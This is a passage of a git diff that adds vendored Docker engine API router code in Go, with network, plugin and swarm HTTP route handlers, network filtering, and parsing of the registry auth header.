+// and returns user chosen networks
+func filterNetworks(nws []types.NetworkResource, filter filters.Args) ([]types.NetworkResource, error) {
+	// if filter is empty, return original network list
+	if filter.Len() == 0 {
+		return nws, nil
+	}
+
+	if err := filter.Validate(AcceptedFilters); err != nil {
+		return nil, err
+	}
+
+	displayNet := []types.NetworkResource{}
+	for _, nw := range nws {
+		if filter.Include("driver") {
+			if !filter.ExactMatch("driver", nw.Driver) {
+				continue
+			}
+		}
+		if filter.Include("name") {
+			if !filter.Match("name", nw.Name) {
+				continue
+			}
+		}
+		if filter.Include("id") {
+			if !filter.Match("id", nw.ID) {
+				continue
+			}
+		}
+		if filter.Include("label") {
+			if !filter.MatchKVList("label", nw.Labels) {
+				continue
+			}
+		}
+		displayNet = append(displayNet, nw)
+	}
+
+	if filter.Include("type") {
+		var typeNet []types.NetworkResource
+		errFilter := filter.WalkValues("type", func(fval string) error {
+			passList, err := filterNetworkByType(displayNet, fval)
+			if err != nil {
+				return err
+			}
+			typeNet = append(typeNet, passList...)
+			return nil
+		})
+		if errFilter != nil {
+			return nil, errFilter
+		}
+		displayNet = typeNet
+	}
+
+	return displayNet, nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/network/network.go b/vendor/github.com/docker/docker/api/server/router/network/network.go
new file mode 100644
index 0000000000..08a5c8c6a6
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/network/network.go
@@ -0,0 +1,44 @@
+package network
+
+import (
+	"github.com/docker/docker/api/server/router"
+	"github.com/docker/docker/daemon/cluster"
+)
+
+// networkRouter is a router to talk with the network controller
+type networkRouter struct {
+	backend         Backend
+	clusterProvider *cluster.Cluster
+	routes          []router.Route
+}
+
+// NewRouter initializes a new network router
+func NewRouter(b Backend, c *cluster.Cluster) router.Router {
+	r := &networkRouter{
+		backend:         b,
+		clusterProvider: c,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routes to the network controller
+func (r *networkRouter) Routes() []router.Route {
+	return r.routes
+}
+
+func (r *networkRouter) initRoutes() {
+	r.routes = []router.Route{
+		// GET
+		router.NewGetRoute("/networks", r.getNetworksList),
+		router.NewGetRoute("/networks/", r.getNetworksList),
+		router.NewGetRoute("/networks/{id:.+}", r.getNetwork),
+		// POST
+		router.NewPostRoute("/networks/create", r.postNetworkCreate),
+		router.NewPostRoute("/networks/{id:.*}/connect", r.postNetworkConnect),
+		router.NewPostRoute("/networks/{id:.*}/disconnect", r.postNetworkDisconnect),
+		router.NewPostRoute("/networks/prune", r.postNetworksPrune),
+		// DELETE
+		router.NewDeleteRoute("/networks/{id:.*}", r.deleteNetwork),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/network/network_routes.go b/vendor/github.com/docker/docker/api/server/router/network/network_routes.go
new file mode 100644
index 0000000000..7bfc499552
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/network/network_routes.go
@@ -0,0 +1,308 @@
+package network
+
+import (
+	"encoding/json"
+	"net/http"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/libnetwork"
+	"github.com/docker/libnetwork/networkdb"
+)
+
+func (n *networkRouter) getNetworksList(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	filter := r.Form.Get("filters")
+	netFilters, err := filters.FromParam(filter)
+	if err != nil {
+		return err
+	}
+
+	list := []types.NetworkResource{}
+
+	if nr, err := n.clusterProvider.GetNetworks(); err == nil {
+		list = append(list, nr...)
+	}
+
+	// Combine the network list returned by Docker daemon if it is not already
+	// returned by the cluster manager
+SKIP:
+	for _, nw := range n.backend.GetNetworks() {
+		for _, nl := range list {
+			if nl.ID == nw.ID() {
+				continue SKIP
+			}
+		}
+		list = append(list, *n.buildNetworkResource(nw))
+	}
+
+	list, err = filterNetworks(list, netFilters)
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, list)
+}
+
+func (n *networkRouter) getNetwork(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	nw, err := n.backend.FindNetwork(vars["id"])
+	if err != nil {
+		if nr, err := n.clusterProvider.GetNetwork(vars["id"]); err == nil {
+			return httputils.WriteJSON(w, http.StatusOK, nr)
+		}
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, n.buildNetworkResource(nw))
+}
+
+func (n *networkRouter) postNetworkCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var create types.NetworkCreateRequest
+
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+
+	if err := json.NewDecoder(r.Body).Decode(&create); err != nil {
+		return err
+	}
+
+	if nws, err := n.clusterProvider.GetNetworksByName(create.Name); err == nil && len(nws) > 0 {
+		return libnetwork.NetworkNameError(create.Name)
+	}
+
+	nw, err := n.backend.CreateNetwork(create)
+	if err != nil {
+		if _, ok := err.(libnetwork.ManagerRedirectError); !ok {
+			return err
+		}
+		id, err := n.clusterProvider.CreateNetwork(create)
+		if err != nil {
+			return err
+		}
+		nw = &types.NetworkCreateResponse{ID: id}
+	}
+
+	return httputils.WriteJSON(w, http.StatusCreated, nw)
+}
+
+func (n *networkRouter) postNetworkConnect(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var connect types.NetworkConnect
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+
+	if err := json.NewDecoder(r.Body).Decode(&connect); err != nil {
+		return err
+	}
+
+	return n.backend.ConnectContainerToNetwork(connect.Container, vars["id"], connect.EndpointConfig)
+}
+
+func (n *networkRouter) postNetworkDisconnect(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var disconnect types.NetworkDisconnect
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+
+	if err := json.NewDecoder(r.Body).Decode(&disconnect); err != nil {
+		return err
+	}
+
+	return n.backend.DisconnectContainerFromNetwork(disconnect.Container, vars["id"], disconnect.Force)
+}
+
+func (n *networkRouter) deleteNetwork(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	if _, err := n.clusterProvider.GetNetwork(vars["id"]); err == nil {
+		if err = n.clusterProvider.RemoveNetwork(vars["id"]); err != nil {
+			return err
+		}
+		w.WriteHeader(http.StatusNoContent)
+		return nil
+	}
+	if err := n.backend.DeleteNetwork(vars["id"]); err != nil {
+		return err
+	}
+	w.WriteHeader(http.StatusNoContent)
+	return nil
+}
+
+func (n *networkRouter) buildNetworkResource(nw libnetwork.Network) *types.NetworkResource {
+	r := &types.NetworkResource{}
+	if nw == nil {
+		return r
+	}
+
+	info := nw.Info()
+	r.Name = nw.Name()
+	r.ID = nw.ID()
+	r.Created = info.Created()
+	r.Scope = info.Scope()
+	if n.clusterProvider.IsManager() {
+		if _, err := n.clusterProvider.GetNetwork(nw.ID()); err == nil {
+			r.Scope = "swarm"
+		}
+	} else if info.Dynamic() {
+		r.Scope = "swarm"
+	}
+	r.Driver = nw.Type()
+	r.EnableIPv6 = info.IPv6Enabled()
+	r.Internal = info.Internal()
+	r.Attachable = info.Attachable()
+	r.Options = info.DriverOptions()
+	r.Containers = make(map[string]types.EndpointResource)
+	buildIpamResources(r, info)
+	r.Labels = info.Labels()
+
+	peers := info.Peers()
+	if len(peers) != 0 {
+		r.Peers = buildPeerInfoResources(peers)
+	}
+
+	epl := nw.Endpoints()
+	for _, e := range epl {
+		ei := e.Info()
+		if ei == nil {
+			continue
+		}
+		sb := ei.Sandbox()
+		tmpID := e.ID()
+		key := "ep-" + tmpID
+		if sb != nil {
+			key = sb.ContainerID()
+		}
+
+		r.Containers[key] = buildEndpointResource(tmpID, e.Name(), ei)
+	}
+	return r
+}
+
+func buildPeerInfoResources(peers []networkdb.PeerInfo) []network.PeerInfo {
+	peerInfo := make([]network.PeerInfo, 0, len(peers))
+	for _, peer := range peers {
+		peerInfo = append(peerInfo, network.PeerInfo{
+			Name: peer.Name,
+			IP:   peer.IP,
+		})
+	}
+	return peerInfo
+}
+
+func buildIpamResources(r *types.NetworkResource, nwInfo libnetwork.NetworkInfo) {
+	id, opts, ipv4conf, ipv6conf := nwInfo.IpamConfig()
+
+	ipv4Info, ipv6Info := nwInfo.IpamInfo()
+
+	r.IPAM.Driver = id
+
+	r.IPAM.Options = opts
+
+	r.IPAM.Config = []network.IPAMConfig{}
+	for _, ip4 := range ipv4conf {
+		if ip4.PreferredPool == "" {
+			continue
+		}
+		iData := network.IPAMConfig{}
+		iData.Subnet = ip4.PreferredPool
+		iData.IPRange = ip4.SubPool
+		iData.Gateway = ip4.Gateway
+		iData.AuxAddress = ip4.AuxAddresses
+		r.IPAM.Config = append(r.IPAM.Config, iData)
+	}
+
+	if len(r.IPAM.Config) == 0 {
+		for _, ip4Info := range ipv4Info {
+			iData := network.IPAMConfig{}
+			iData.Subnet = ip4Info.IPAMData.Pool.String()
+			iData.Gateway = ip4Info.IPAMData.Gateway.IP.String()
+			r.IPAM.Config = append(r.IPAM.Config, iData)
+		}
+	}
+
+	hasIpv6Conf := false
+	for _, ip6 := range ipv6conf {
+		if ip6.PreferredPool == "" {
+			continue
+		}
+		hasIpv6Conf = true
+		iData := network.IPAMConfig{}
+		iData.Subnet = ip6.PreferredPool
+		iData.IPRange = ip6.SubPool
+		iData.Gateway = ip6.Gateway
+		iData.AuxAddress = ip6.AuxAddresses
+		r.IPAM.Config = append(r.IPAM.Config, iData)
+	}
+
+	if !hasIpv6Conf {
+		for _, ip6Info := range ipv6Info {
+			if ip6Info.IPAMData.Pool == nil {
+				continue
+			}
+			iData := network.IPAMConfig{}
+			iData.Subnet = ip6Info.IPAMData.Pool.String()
+			iData.Gateway = ip6Info.IPAMData.Gateway.String()
+			r.IPAM.Config = append(r.IPAM.Config, iData)
+		}
+	}
+}
+
+func buildEndpointResource(id string, name string, info libnetwork.EndpointInfo) types.EndpointResource {
+	er := types.EndpointResource{}
+
+	er.EndpointID = id
+	er.Name = name
+	ei := info
+	if ei == nil {
+		return er
+	}
+
+	if iface := ei.Iface(); iface != nil {
+		if mac := iface.MacAddress(); mac != nil {
+			er.MacAddress = mac.String()
+		}
+		if ip := iface.Address(); ip != nil && len(ip.IP) > 0 {
+			er.IPv4Address = ip.String()
+		}
+
+		if ipv6 := iface.AddressIPv6(); ipv6 != nil && len(ipv6.IP) > 0 {
+			er.IPv6Address = ipv6.String()
+		}
+	}
+	return er
+}
+
+func (n *networkRouter) postNetworksPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	pruneReport, err := n.backend.NetworksPrune(filters.Args{})
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, pruneReport)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/backend.go b/vendor/github.com/docker/docker/api/server/router/plugin/backend.go
new file mode 100644
index 0000000000..ab006b2256
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/plugin/backend.go
@@ -0,0 +1,25 @@
+package plugin
+
+import (
+	"io"
+	"net/http"
+
+	enginetypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/reference"
+	"golang.org/x/net/context"
+)
+
+// Backend for Plugin
+type Backend interface {
+	Disable(name string, config *enginetypes.PluginDisableConfig) error
+	Enable(name string, config *enginetypes.PluginEnableConfig) error
+	List() ([]enginetypes.Plugin, error)
+	Inspect(name string) (*enginetypes.Plugin, error)
+	Remove(name string, config *enginetypes.PluginRmConfig) error
+	Set(name string, args []string) error
+	Privileges(ctx context.Context, ref reference.Named, metaHeaders http.Header, authConfig *enginetypes.AuthConfig) (enginetypes.PluginPrivileges, error)
+	Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error
+	Push(ctx context.Context, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, outStream io.Writer) error
+	Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error
+	CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *enginetypes.PluginCreateOptions) error
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go b/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go
new file mode 100644
index 0000000000..e4ea9e23bf
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go
@@ -0,0 +1,39 @@
+package plugin
+
+import "github.com/docker/docker/api/server/router"
+
+// pluginRouter is a router to talk with the plugin controller
+type pluginRouter struct {
+	backend Backend
+	routes  []router.Route
+}
+
+// NewRouter initializes a new plugin router
+func NewRouter(b Backend) router.Router {
+	r := &pluginRouter{
+		backend: b,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routers to the plugin controller
+func (r *pluginRouter) Routes() []router.Route {
+	return r.routes
+}
+
+func (r *pluginRouter) initRoutes() {
+	r.routes = []router.Route{
+		router.NewGetRoute("/plugins", r.listPlugins),
+		router.NewGetRoute("/plugins/{name:.*}/json", r.inspectPlugin),
+		router.NewGetRoute("/plugins/privileges", r.getPrivileges),
+		router.NewDeleteRoute("/plugins/{name:.*}", r.removePlugin),
+		router.NewPostRoute("/plugins/{name:.*}/enable", r.enablePlugin), // PATCH?
+		router.NewPostRoute("/plugins/{name:.*}/disable", r.disablePlugin),
+		router.Cancellable(router.NewPostRoute("/plugins/pull", r.pullPlugin)),
+		router.Cancellable(router.NewPostRoute("/plugins/{name:.*}/push", r.pushPlugin)),
+		router.Cancellable(router.NewPostRoute("/plugins/{name:.*}/upgrade", r.upgradePlugin)),
+		router.NewPostRoute("/plugins/{name:.*}/set", r.setPlugin),
+		router.NewPostRoute("/plugins/create", r.createPlugin),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go b/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go
new file mode 100644
index 0000000000..693fa95baf
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go
@@ -0,0 +1,314 @@
+package plugin
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"net/http"
+	"strconv"
+	"strings"
+
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/reference"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+)
+
+func parseHeaders(headers http.Header) (map[string][]string, *types.AuthConfig) {
+
+	metaHeaders := map[string][]string{}
+	for k, v := range headers {
+		if strings.HasPrefix(k, "X-Meta-") {
+			metaHeaders[k] = v
+		}
+	}
+
+	// Get X-Registry-Auth
+	authEncoded := headers.Get("X-Registry-Auth")
+	authConfig := &types.AuthConfig{}
+	if authEncoded != "" {
+		authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded))
+		if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil {
+			authConfig = &types.AuthConfig{}
+		}
+	}
+
+	return metaHeaders, authConfig
+}
+
+// parseRemoteRef parses the remote reference into a reference.Named
+// returning the tag associated with the reference. In the case the
+// given reference string includes both digest and tag, the returned
+// reference will have the digest without the tag, but the tag will
+// be returned.
+func parseRemoteRef(remote string) (reference.Named, string, error) {
+	// Parse remote reference, supporting remotes with name and tag
+	// NOTE: Using distribution reference to handle references
+	// containing both a name and digest
+	remoteRef, err := distreference.ParseNamed(remote)
+	if err != nil {
+		return nil, "", err
+	}
+
+	var tag string
+	if t, ok := remoteRef.(distreference.Tagged); ok {
+		tag = t.Tag()
+	}
+
+	// Convert distribution reference to docker reference
+	// TODO: remove when docker reference changes reconciled upstream
+	ref, err := reference.WithName(remoteRef.Name())
+	if err != nil {
+		return nil, "", err
+	}
+	if d, ok := remoteRef.(distreference.Digested); ok {
+		ref, err = reference.WithDigest(ref, d.Digest())
+		if err != nil {
+			return nil, "", err
+		}
+	} else if tag != "" {
+		ref, err = reference.WithTag(ref, tag)
+		if err != nil {
+			return nil, "", err
+		}
+	} else {
+		ref = reference.WithDefaultTag(ref)
+	}
+
+	return ref, tag, nil
+}
+
+func (pr *pluginRouter) getPrivileges(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	metaHeaders, authConfig := parseHeaders(r.Header)
+
+	ref, _, err := parseRemoteRef(r.FormValue("remote"))
+	if err != nil {
+		return err
+	}
+
+	privileges, err := pr.backend.Privileges(ctx, ref, metaHeaders, authConfig)
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, privileges)
+}
+
+func (pr *pluginRouter) upgradePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return errors.Wrap(err, "failed to parse form")
+	}
+
+	var privileges types.PluginPrivileges
+	dec := json.NewDecoder(r.Body)
+	if err := dec.Decode(&privileges); err != nil {
+		return errors.Wrap(err, "failed to parse privileges")
+	}
+	if dec.More() {
+		return errors.New("invalid privileges")
+	}
+
+	metaHeaders, authConfig := parseHeaders(r.Header)
+	ref, tag, err := parseRemoteRef(r.FormValue("remote"))
+	if err != nil {
+		return err
+	}
+
+	name, err := getName(ref, tag, vars["name"])
+	if err != nil {
+		return err
+	}
+	w.Header().Set("Docker-Plugin-Name", name)
+
+	w.Header().Set("Content-Type", "application/json")
+	output := ioutils.NewWriteFlusher(w)
+
+	if err := pr.backend.Upgrade(ctx, ref, name, metaHeaders, authConfig, privileges, output); err != nil {
+		if !output.Flushed() {
+			return err
+		}
+		output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err))
+	}
+
+	return nil
+}
+
+func (pr *pluginRouter) pullPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return errors.Wrap(err, "failed to parse form")
+	}
+
+	var privileges types.PluginPrivileges
+	dec := json.NewDecoder(r.Body)
+	if err := dec.Decode(&privileges); err != nil {
+		return errors.Wrap(err, "failed to parse privileges")
+	}
+	if dec.More() {
+		return errors.New("invalid privileges")
+	}
+
+	metaHeaders, authConfig := parseHeaders(r.Header)
+	ref, tag, err := parseRemoteRef(r.FormValue("remote"))
+	if err != nil {
+		return err
+	}
+
+	name, err := getName(ref, tag, r.FormValue("name"))
+	if err != nil {
+		return err
+	}
+	w.Header().Set("Docker-Plugin-Name", name)
+
+	w.Header().Set("Content-Type", "application/json")
+	output := ioutils.NewWriteFlusher(w)
+
+	if err := pr.backend.Pull(ctx, ref, name, metaHeaders, authConfig, privileges, output); err != nil {
+		if !output.Flushed() {
+			return err
+		}
+		output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err))
+	}
+
+	return nil
+}
+
+func getName(ref reference.Named, tag, name string) (string, error) {
+	if name == "" {
+		if _, ok := ref.(reference.Canonical); ok {
+			trimmed := reference.TrimNamed(ref)
+			if tag != "" {
+				nt, err := reference.WithTag(trimmed, tag)
+				if err != nil {
+					return "", err
+				}
+				name = nt.String()
+			} else {
+				name = reference.WithDefaultTag(trimmed).String()
+			}
+		} else {
+			name = ref.String()
+		}
+	} else {
+		localRef, err := reference.ParseNamed(name)
+		if err != nil {
+			return "", err
+		}
+		if _, ok := localRef.(reference.Canonical); ok {
+			return "", errors.New("cannot use digest in plugin tag")
+		}
+		if distreference.IsNameOnly(localRef) {
+			// TODO: log change in name to out stream
+			name = reference.WithDefaultTag(localRef).String()
+		}
+	}
+	return name, nil
+}
+
+func (pr *pluginRouter) createPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	options := &types.PluginCreateOptions{
+		RepoName: r.FormValue("name")}
+
+	if err := pr.backend.CreateFromContext(ctx, r.Body, options); err != nil {
+		return err
+	}
+	//TODO: send progress bar
+	w.WriteHeader(http.StatusNoContent)
+	return nil
+}
+
+func (pr *pluginRouter) enablePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	name := vars["name"]
+	timeout, err := strconv.Atoi(r.Form.Get("timeout"))
+	if err != nil {
+		return err
+	}
+	config := &types.PluginEnableConfig{Timeout: timeout}
+
+	return pr.backend.Enable(name, config)
+}
+
+func (pr *pluginRouter) disablePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	name := vars["name"]
+	config := &types.PluginDisableConfig{
+		ForceDisable: httputils.BoolValue(r, "force"),
+	}
+
+	return pr.backend.Disable(name, config)
+}
+
+func (pr *pluginRouter) removePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	name := vars["name"]
+	config := &types.PluginRmConfig{
+		ForceRemove: httputils.BoolValue(r, "force"),
+	}
+	return pr.backend.Remove(name, config)
+}
+
+func (pr *pluginRouter) pushPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return errors.Wrap(err, "failed to parse form")
+	}
+
+	metaHeaders, authConfig := parseHeaders(r.Header)
+
+	w.Header().Set("Content-Type", "application/json")
+	output := ioutils.NewWriteFlusher(w)
+
+	if err := pr.backend.Push(ctx, vars["name"], metaHeaders, authConfig, output); err != nil {
+		if !output.Flushed() {
+			return err
+		}
+		output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err))
+	}
+	return nil
+}
+
+func (pr *pluginRouter) setPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var args []string
+	if err := json.NewDecoder(r.Body).Decode(&args); err != nil {
+		return err
+	}
+	if err := pr.backend.Set(vars["name"], args); err != nil {
+		return err
+	}
+	w.WriteHeader(http.StatusNoContent)
+	return nil
+}
+
+func (pr *pluginRouter) listPlugins(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	l, err := pr.backend.List()
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, l)
+}
+
+func (pr *pluginRouter) inspectPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	result, err := pr.backend.Inspect(vars["name"])
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, result)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/router.go b/vendor/github.com/docker/docker/api/server/router/router.go
new file mode 100644
index 0000000000..2de25c27ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/router.go
@@ -0,0 +1,19 @@
+package router
+
+import "github.com/docker/docker/api/server/httputils"
+
+// Router defines an interface to specify a group of routes to add to the docker server.
+type Router interface {
+	// Routes returns the list of routes to add to the docker server.
+	Routes() []Route
+}
+
+// Route defines an individual API route in the docker server.
+type Route interface {
+	// Handler returns the raw function to create the http handler.
+	Handler() httputils.APIFunc
+	// Method returns the http method that the route responds to.
+	Method() string
+	// Path returns the subpath where the route responds to.
+	Path() string
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/backend.go b/vendor/github.com/docker/docker/api/server/router/swarm/backend.go
new file mode 100644
index 0000000000..33840f0d30
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/swarm/backend.go
@@ -0,0 +1,36 @@
+package swarm
+
+import (
+	basictypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	types "github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// Backend abstracts an swarm commands manager.
+type Backend interface {
+	Init(req types.InitRequest) (string, error)
+	Join(req types.JoinRequest) error
+	Leave(force bool) error
+	Inspect() (types.Swarm, error)
+	Update(uint64, types.Spec, types.UpdateFlags) error
+	GetUnlockKey() (string, error)
+	UnlockSwarm(req types.UnlockRequest) error
+	GetServices(basictypes.ServiceListOptions) ([]types.Service, error)
+	GetService(string) (types.Service, error)
+	CreateService(types.ServiceSpec, string) (*basictypes.ServiceCreateResponse, error)
+	UpdateService(string, uint64, types.ServiceSpec, string, string) (*basictypes.ServiceUpdateResponse, error)
+	RemoveService(string) error
+	ServiceLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error
+	GetNodes(basictypes.NodeListOptions) ([]types.Node, error)
+	GetNode(string) (types.Node, error)
+	UpdateNode(string, uint64, types.NodeSpec) error
+	RemoveNode(string, bool) error
+	GetTasks(basictypes.TaskListOptions) ([]types.Task, error)
+	GetTask(string) (types.Task, error)
+	GetSecrets(opts basictypes.SecretListOptions) ([]types.Secret, error)
+	CreateSecret(s types.SecretSpec) (string, error)
+	RemoveSecret(id string) error
+	GetSecret(id string) (types.Secret, error)
+	UpdateSecret(id string, version uint64, spec types.SecretSpec) error
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go b/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go
new file mode 100644
index 0000000000..e2d5ad19b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go
@@ -0,0 +1,52 @@
+package swarm
+
+import "github.com/docker/docker/api/server/router"
+
+// swarmRouter is a router to talk with the build controller
+type swarmRouter struct {
+	backend Backend
+	routes  []router.Route
+}
+
+// NewRouter initializes a new build router
+func NewRouter(b Backend) router.Router {
+	r := &swarmRouter{
+		backend: b,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routers to the swarm controller
+func (sr *swarmRouter) Routes() []router.Route {
+	return sr.routes
+}
+
+func (sr *swarmRouter) initRoutes() {
+	sr.routes = []router.Route{
+		router.NewPostRoute("/swarm/init", sr.initCluster),
+		router.NewPostRoute("/swarm/join", sr.joinCluster),
+		router.NewPostRoute("/swarm/leave", sr.leaveCluster),
+		router.NewGetRoute("/swarm", sr.inspectCluster),
+		router.NewGetRoute("/swarm/unlockkey", sr.getUnlockKey),
+		router.NewPostRoute("/swarm/update", sr.updateCluster),
+		router.NewPostRoute("/swarm/unlock", sr.unlockCluster),
+		router.NewGetRoute("/services", sr.getServices),
+		router.NewGetRoute("/services/{id}", sr.getService),
+		router.NewPostRoute("/services/create", sr.createService),
+		router.NewPostRoute("/services/{id}/update", sr.updateService),
+		router.NewDeleteRoute("/services/{id}", sr.removeService),
+		router.Experimental(router.Cancellable(router.NewGetRoute("/services/{id}/logs", sr.getServiceLogs))),
+		router.NewGetRoute("/nodes", sr.getNodes),
+		router.NewGetRoute("/nodes/{id}", sr.getNode),
+		router.NewDeleteRoute("/nodes/{id}", sr.removeNode),
+		router.NewPostRoute("/nodes/{id}/update", sr.updateNode),
+		router.NewGetRoute("/tasks", sr.getTasks),
+		router.NewGetRoute("/tasks/{id}", sr.getTask),
+		router.NewGetRoute("/secrets", sr.getSecrets),
+		router.NewPostRoute("/secrets/create", sr.createSecret),
+		router.NewDeleteRoute("/secrets/{id}", sr.removeSecret),
+		router.NewGetRoute("/secrets/{id}", sr.getSecret),
+		router.NewPostRoute("/secrets/{id}/update", sr.updateSecret),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go b/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go
new file mode 100644
index 0000000000..fe976434bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go
@@ -0,0 +1,418 @@
+package swarm
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"strconv"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/server/httputils"
+	basictypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/filters"
+	types "github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func (sr *swarmRouter) initCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var req types.InitRequest
+	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+		return err
+	}
+	nodeID, err := sr.backend.Init(req)
+	if err != nil {
+		logrus.Errorf("Error initializing swarm: %v", err)
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, nodeID)
+}
+
+func (sr *swarmRouter) joinCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var req types.JoinRequest
+	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+		return err
+	}
+	return sr.backend.Join(req)
+}
+
+func (sr *swarmRouter) leaveCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	force := httputils.BoolValue(r, "force")
+	return sr.backend.Leave(force)
+}
+
+func (sr *swarmRouter) inspectCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	swarm, err := sr.backend.Inspect()
